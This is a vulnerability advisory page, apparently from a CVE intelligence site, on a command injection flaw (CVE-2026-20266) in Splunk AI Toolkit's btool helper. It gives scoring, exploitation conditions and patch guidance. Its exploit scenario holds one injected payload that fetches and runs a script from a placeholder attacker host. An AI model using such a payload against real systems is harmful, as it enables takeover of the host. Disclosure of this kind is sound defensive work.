Splunk AI Toolkit
CVE-2026-20266
CRITICAL
Severity by source
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Network-reachable Splunk management plane (AV:N), no special conditions beyond admin role (AC:L, PR:H), no user interaction, and shell escape from splunkd to OS justifies S:C with full CIA impact.
Primary rating from Vendor (cisco).
CVSS VectorVendor: cisco
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
1DescriptionCVE.org
In Splunk AI Toolkit versions below 5.7.4, a user who holds the "admin" Splunk role could execute arbitrary OS commands on the host running the Splunk Enterprise instance.
The vulnerability is possible because of an unsafe shell execution pattern in the btool configuration helper, which constructs OS command strings from dynamic parameters without disabling shell interpretation.
AnalysisAI
Authenticated command injection in Splunk AI Toolkit versions below 5.7.4 allows a user with the Splunk admin role to execute arbitrary OS commands on the underlying Splunk Enterprise host. The flaw lives in the btool configuration helper, which builds shell command strings from dynamic parameters with shell interpretation enabled. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires an authenticated session as a user holding the Splunk admin role on a Splunk Enterprise instance that has the Splunk AI Toolkit app (versions below 5.7.4) installed and reachable; the attacker must invoke the btool configuration helper code path and supply parameter values containing shell metacharacters. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 9.1 is driven mainly by AV:N, S:C, and full CIA impact, but PR:H means the attacker must already hold the Splunk admin role - a highly privileged identity that, in most realistic Splunk deployments, can already install apps, modify inputs.conf, and run scripted inputs. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has stolen or coerced Splunk admin credentials, or a malicious internal admin seeking host-level access, invokes the AI Toolkit's btool configuration helper with a parameter containing shell metacharacters such as `; curl http://attacker/x.sh | sh`. Because the helper concatenates the value into a shell command string, the injected payload executes as the splunkd OS user, giving the attacker an interactive foothold on the Splunk Enterprise host beyond Splunk's RBAC boundary. … |
| Remediation | Vendor-released patch: upgrade the Splunk AI Toolkit app to version 5.7.4 or later, per Splunk advisory SVD-2026-0614 (https://advisory.splunk.com/advisories/SVD-2026-0614). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: identify all Splunk AI Toolkit installations and document which are running versions below 5.7.4; audit the complete membership of the Splunk admin role. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Unauthenticated arbitrary file write in Splunk Enterprise (below 10.2.4 and 10.0.7) and Splunk Cloud Platform (below 10.
Remote code execution in Splunk Enterprise, Splunk Cloud Platform, and the Splunk Secure Gateway app allows a low-privil
Path traversal in the CSV Export endpoint of ghantakiran's splunk-mcp-integration allows remote unauthenticated attacker
In Splunk Enterprise versions below 9.3.3, 9.2.5, and 9.1.8, and Splunk Cloud Platform versions below 9.3.2408.104, 9.2.
Privilege escalation vulnerability in Splunk Universal Forwarder for Windows where incorrect file system permissions are
In Splunk Universal Forwarder for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an u
In Splunk Enterprise for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to
Server-side request forgery in Splunk Enterprise (below 10.2.4, 10.0.7, 9.4.12, 9.3.13) and Splunk Cloud Platform lets a
In Splunk Enterprise versions below 10.0.1, 9.4.4, 9.3.6 and 9.2.8, and Splunk Cloud Platform versions below 9.3.2411.10
Sensitive information disclosure in Splunk Enterprise (below 10.2.2 and 10.0.5) and Splunk Cloud Platform (multiple bran
Arbitrary shell command execution in Splunk Enterprise and Cloud Platform allows authenticated users with the edit_cmd c
In Splunk Enterprise versions below 9.4.1, 9.3.3, 9.2.5, and 9.1.8, and versions below 3.8.38 and 3.7.23 of the Splunk S
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today